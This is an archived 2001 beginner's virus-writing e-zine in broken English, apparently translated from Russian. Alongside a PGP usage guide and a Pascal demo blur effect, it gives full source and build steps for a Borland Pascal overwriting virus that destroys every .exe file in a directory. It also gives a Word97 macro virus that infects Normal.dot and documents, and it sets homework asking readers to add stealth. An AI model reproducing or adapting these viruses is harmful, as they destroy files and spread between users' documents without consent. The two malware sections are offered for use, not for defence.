Copy Link

Add to Bookmark

Report

(my first e-zine) BKNY0NNX

eZine lover (@eZine)

Published in

my first ezine

· 2 years ago

(my first e-zine) BKNY0NNX // SBVC (c) 27.10.2001

MY FIRST E-ZINE

My1Zine0.E00 - Index
My1Zine0.E01 - Introduction
My1Zine0.E02 - Writing the overwriting virus on Borland Pascal 7.00
My1Zine0.E03 - Writing Word97-macrovirus for beginners
My1Zine0.E04 - Using PGP
My1Zine0.E04 - The creation of demos

Introduction

That you presently read, is unique in its sort by publishing in english language for beginning virmakers. It is intended for those, who can write program, but can't write viruses.

Think, this tiny journal you will help to make the jump from khiznyak before own ideas.

Why "MY FIRST E-ZINE" ? In exUSSR was published the series for children "My First Book".

Any constructive critiques is taken.

Send your own article and reviews!

Greetz to:
Gr.Protagor // SBVC Santa // SBVC GU // SBVC

Writing the overwriting virus on Borland Pascal 7.00

You have solved to write the virus, but that it there was on-more simply and on-dangerous. I think that this will become you value ;)

The virus possible to write in any language, but I has chosen BP7, because of its simplicities and ample amount of programs on him.

The Algorithm of our most primitive virus is:

 …---------------ª 
 |Open its file, | 
 |read viral body| 
 |and close it   | 
 »------—--------º 
 
 …------œ--------ª 
 |Find first     | 
 |victim         | 
 »------—--------º 
 
 …------œ--------ª 
 |If not found   | 
 |      -        |-----ø 
 |     exit      |      | 
 »------—--------º      | 
                        | 
 …------œ----------ª    | 
 |Open victim's    |    | 
 |file, write virus|    | 
 |and close file   |    | 
 »------—----------º    | 
                        | 
 …------œ----------ª    | 
 |Find next        «----Ÿ 
 |victim           | 
 »-----------------º

Essence its in that that it its body rewrites bodies of their own victims (rewriting AKA overwriter)

Here is and its source:

=====[CUT HERE]===== 
(* Name of program *) 
Program Trivial_1; 

(* We shall use additional module, giving services for work with DOS *) 
Uses Dos; 

Const 
	BodySize = 2608;	(* length of virus *) 

Var 
	F : File;		(* file variable for work with files *) 
	DirInfo : SearchRec;	(* variable for searching for of files *) 
	Body : Array [1..BodySize] of Byte; (* vault of body of virus *) 

BEGIN 

	Assign(F, ParamStr(0));	(* Preparation to opening itself: in ParamStr(0) - our name *) 
	Reset(F, 1);		(* We Open... *) 
	BlockRead(F, Body, BodySize); (* We Read its body *) 
	Close(F);		(* We Close itself *) 

	FindFirst('*.exe', AnyFile, DirInfo); (* We Search For first victim *) 

	While DosError = 0 Do Begin (* If it was sewn on... *) 

		Assign(F, DirInfo.Name); (* Preparation to opening of victim: 
				in DirInfo.Name - name of victim *) 
		ReWrite(F, 1);			(* We Rewrite *) 
		BlockWrite(F, Body, BodySize);	(* We write our body *) 
		Close(F);			(* We close *) 

		FindNext(DirInfo);	(* We Search For necessarying victim *) 
		End; 

END. 
=====[END CUT]======

The lines between =====[END HERE]===== and =====[END CUT]====== necessary to slice, write in file, and this file to compile by means of Borland (Turbo) Pascal 7.0. If length of got virus differs from BodySize, that BodySize to is necessary change on length of got virus and compile the virus.

Task on house: ;)

Understand the code of virus;
Change the code to if length of victim more lengths of virus, length of victim did not change.

Want the success!

Writing Word97-macrovirus for beginners

All heard of that, that nigh only each infection accounts for macrovirus. You consider that writing of such virus too in a complicated way for beginning? Nowhere near! For this necessary only to know Visual Basic

In base of work of any macroviruses lies the events under different operations with document: opening, closing, conservation, seal... (The Full list refer to in "AntiViral ToolKit Pro Virus Encyclopedia by E.Kaspersky". That virus was able to infect necessary to process at least one event, eg. the Opening AKA Document_Open:

Sub Document_Open() 
... there goes viral code ... 
End Sub

The events, I think, you learned to process. Now necessary to copy the code of virus there, where necessary. In general, necessary to copy the code of virus in infected document (without this it is impossible ;) and Normal.dot - for activation under each start of Word.

As this is realized:

Copies macroses from Normal.dot to document:

If NT.Lines(1, 1) <> "'W97M" Then ' If NormalDot not infected then 
NT.DeleteLines 1, NT.CountOfLines ' delete all line of code NT in him. 
InsertLines 1, AD.Lines(1, AD.CountOfLines) ' and copies itself from ActiveDoc 
End If

Copies macroses from document to normal.dot:

If AD.Lines(1, 1) <> "'W97M" Then ' If ActiveDoc not infected then 
AD.DeleteLines 1, AD.CountOfLines ' delete all line of code AD in him 
InsertLines 1, NT.Lines(1, NT.CountOfLines) ' and mines itself from NormalDot 
End If

These fragments simply line by line copy code of virus if in its begin code stands commentary "W97M"

Yes, AD and NT whole only point to objects code:

Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule

Better and more simply try to copy itself from victim to Normal.Dot conversely it from somewhere or other is yes copied ;)

STELTH-MECHANISMS are realized making the EMPTY HANDLERS of events on that events, which threaten to show viral code

Well and, certainly, remember to process the errors, eg.. so:
On Error Resume Next
Virus must spreads in any way :)

Well but here is code of YOURS virus:

'W97M 
'Processing Opening of Victim 
Sub Document_Open() 
'Do not on errors 
On Error Resume Next 
'Install objects 
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule 
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule 
'Copies itself from Normal to victim 
If NT.Lines(1, 1) <> "'W97M" Then 
NT.DeleteLines 1, NT.CountOfLines 
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines) 
End If 
'Copies itself from victim to Normal 
If AD.Lines(1, 1) <> "'W97M" Then 
AD.DeleteLines 1, AD.CountOfLines 
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines) 
End If 
'End! 
End Sub

For preparing virus necessary:

Create document in MS Word 97/2k and put there heap of text and pictures ;)
Fall into editor VBA (Tools\Macro\Visual Basic Editor) or on Alt+F11
In tree of project click twice by mouse Project\ThisDocument or F7
Enter code of virus
Save

The task on home: Write stealth

Good luck!

Using of the PGP

In this dock I will teach you how to use PGP.

The people always worry safety of its information i.e. inaccessibility it for someone else eye.
Well but PGP - Pretty Good Privacy - coolest system of cryptooperation with open key, intended for secret of listing between itself users and not only ;)
THE MAIN DIFFERENCE of system a cryptooperation with open key from other systems of cryptooperation consists in that that are used TWO KEYS (the PAIR of KEYS) instead of one - HIDDEN, by means of which YOU WILL DECIPHER the messages, sent you, and OPEN (PUBLIC), by means of which YOU WILL ENCODE the letters.
Yes - beside that, with whom you conduct correspondence, must be such version of PGP. For the best use PGP for DOS versions 2.6.
Hereinafter - all that happens to in quotes, type "steep word", is necessary print without "" :)
Installation PGP much forgive - unarchivate/copy the kit of supply PGP somewhere. Well and begin to use. Is it in the same way recommended install the variable encirclement named "TZ" in that temporary zone, in which you inhere, for exact time. For Moscow this will as

SET TZ=MSK

It's recommended install the variable encirclement named "PGP" on directory with files PGP.
To with you could correspond, you to is necessary create its pair of keys - open and secret. For this cause PGP with command line "-KG"

PGP.EXE -KG

Hereinafter you will is given the question about length of key. You may simply type one of the that numbers, which you have offerred, but better type 2048 - greatly possible length of key.
You will is given the question, on who create the keys. All that you will put in arrows of type "<" and ">", will simply be additional information, eg. the mailbox.
The Example:

Your Very Kewl Alias <alias.microsoft@chat.com>

Hereinafter you will be necessary to enter its password, which you will use. Then is necessary to repeat entering of password. KEEP THIS PASSWORD IN MEMORY!
Now PGP necessary casual numbers. Their it will get from gaps of time between striking on buttons. Blanch fist on keyoard before beeping :)
Yaeh... Beside you came up for directory with PGP two files:

pubring.pgp - all your in the future open keys. While only one key :)
secring.pgp - your secret key. Nobody do not let's!

To with anyone correspond, you need its open key, but him - your.
Select its open key, having started PGP with parameters "-KXA YoursAlias"

PGP.EXE -KXA KewlAlias

Well and will enter the filename, in which you want to save its key. If you won't enter extension, that its name will "Name.ASC". Send this file who necessary and unnecessary ;)
With you have wanted someone correspond :) And has sent you its open key. Add its key in its ligament, having started PGP with parameters "-KA FullNameOfHisKey"

PGP.EXE -KA FullNameOfHisKey

So. That crypt file therefor, with whom you contact listing, simply start PGP with command line ---

 
--- for cryptooperation in text file "YourFile.ASC" - 
	"-EA YourFile TO_ID [[TO_ID2]...]" 

PGP.EXE -EA YourFile TO_ID [TO_ID2] 

--- for cryptooperation in binary file "YourFile.PGP" - 
	"-E YourFile TO_ID [[TO_ID2]...]" 

PGP.EXE -E YourFile TO_ID [TO_ID2]

Possible lower the field TO_ID, but then grantee to is necessary will enter at question.
Got letter, its is necessary decipher, having started PGP with parameters "CryptedFileName".

PGP.EXE CryptedFileName

But will then enter your password.
Here is and summery of command lines. If see "[A]", that this signifies that using of "A" you get anything in text type, rather then using - in binary.

-KG 							create new key pair 
-KA "FileName"						adds key 
-KX[A] "UsersName" "FileName"				select key 
-KR "UsersName"						take away key 
-E[A] "FileName" "TO_ID" ["TO_ID2" ["TO_ID3"]...]	crypt "FileName" 
-KV							what keys here is 
-H							help

Crypt your data!!!

The creation of demos

Heh :) You have solved to write the demo. The good desire :) Begin with beginning. To write cool demo, is necessary to know, how to do the effects, from which, as from cubes, will be created all new and new demos. I shall consider only video-effects. Video-effects - transformation of scenes on some mathematical formulas.

One of the the most simplest effects - BLUR. Blur is the "washing" raster (the picture). THERE IS AVERAGE OF ARITHMETICAL COLOURS OF NEARBY POINTS IN BLUR POINT OF RASTER TO HER. I.E. YOU DRAW THE PICTURE AND FOR EACH POINT CONSIDER THE AVERAGE OF ARITHMETICAL COLOURS OF NEARBY POINTS TO HER.

And right here begins most interesting :) Well you have drawn picture and were taken consider a.arthm..... Here one begin to write got points in additional buffer, but other - straight in raster. In first event of change the raster for blur is parallel - it their does not see since does not change the source raster. In the second event a raster changes immediately, and algorithm much even sees and uses change. The first event - CLASSICAL (TRUE) BLUR, he has one defect - appearance "lattice". Beside the second, CHANGED BLUR, this defect no, and scene is washed away "softly".

Ä on ·™Æ´Ï™® to points you consider a.arthm.?! On four you get triangles, squares, on eight - lava :) Than more points you use for a.arthm., more so "soft" scene you get.

A little remember - got by a.arthm. possible to change - add to him anything, subtract, multiply, divide, change on mathematical laws...
Restrictions - your fantasy and your IQ :)

Hope, you have understood the theory. But now practice - coding.

We'll be code in 0x13 mode --- 320 * 200 * 8 bits

Yes, I do not use BGI - too slowly. Besides, for speedup of showing the raster all change pass in virtual screen(the usual array), but then given from he is copied stright in videomemory (for us - too usual array). But because of this arrays, in coordinate of point first goes Y, but then - X.

Using the virtual screen is called "DoubleBuffering".

Besides, I use the assembler insertions(between ASM and END), do not understand - nothing terrible, soon understand.

=====[CUT HERE]===== 
(* Begin of source. *) 
Program Blur1; 
(* The description of constants. MaxX - maximum permit of raster on horizont, 
MaxY - on vertical. FlameConst - the added to a.arthm number *) 
Const 
	MaxX		=	320; 
	MaxY		=	200; 
	FlameConst	=	1; 

(* Description of variables. *) 
Var 
	(* S - area of videomemory *) 
	S		: Array [1..MaxY, 1..MaxX] of Byte Absolute $A000:0000; 
	(* VS - Virtual Screen [VS], is used for speedup of work *) 
	VS		: Array [1..MaxY, 1..MaxX] of Byte; 
	(* Variable-counters of cycles *) 
	x, y		: Integer; 

(* The procedure of check a keystroke. Analogue kept in unit CRT, but I has 
written it to not to connect this unit. *) 
Function KeyPressed : Boolean; 
Var	rFlags	: Boolean; 
Label	_Ok, _End; 
begin 
	asm 
		mov	ah, 1 
		int	16h 
		jz	_Ok 
		mov	rFlags, True 
		jmp	_End 
	_Ok:	mov	rFlags, False 
	_End: 
	end; 
	KeyPressed := rFlags; 
end; 

(* Begin main *) 
BEGIN 
	(* We initialize generator of psuedo-randomic numbers *) 
	Randomize; 

	(* We switch monitor to 0x13 mode *) 
	asm 
		mov	ax, 13h 
		int	10h 
	end; 

	(* Fill VS by randomic colours *) 
	for x := 1 to MaxX do for y := 1 to MaxY do 
		VS[y,x] := Random(255); 

	(* We repeat the cycle... *) 
	Repeat 

		(* We pass all POSSIBLE for change the point. So such initial 
		and final importances of counters *) 
		for y := 2 to MaxY-1 do for x := 2 to MaxX-1 do 

		(* The most important moment - BLUR. So simply, but... *) 
			VS[y,x] := (VS[y-1,x-1] + VS[y-1,x-0] + VS[y-1,x+1] + 
				VS[y-0,x-1] + VS[y-0,x+1] + 
				VS[y+1,x-1] + VS[y+1,x-0] + VS[y+1,x+1]) 
				div 8 + FlameConst; 

		(* Above we, for speedup of work, work with VS, but now from he 
		copies the raster to videomemory *) 
		for y := 1 to MaxY do for x := 1 to MaxX do S[y,x] := VS[y,x]; 

	(* We Repeat cycle until will press key *) 
	Until KeyPressed; 

	(* We switch monitor to text mode *) 
	asm 
		mov	ax, 3 
		int	10h 
	end; 

	(* The End *) 
END. 
=====[END CUT]======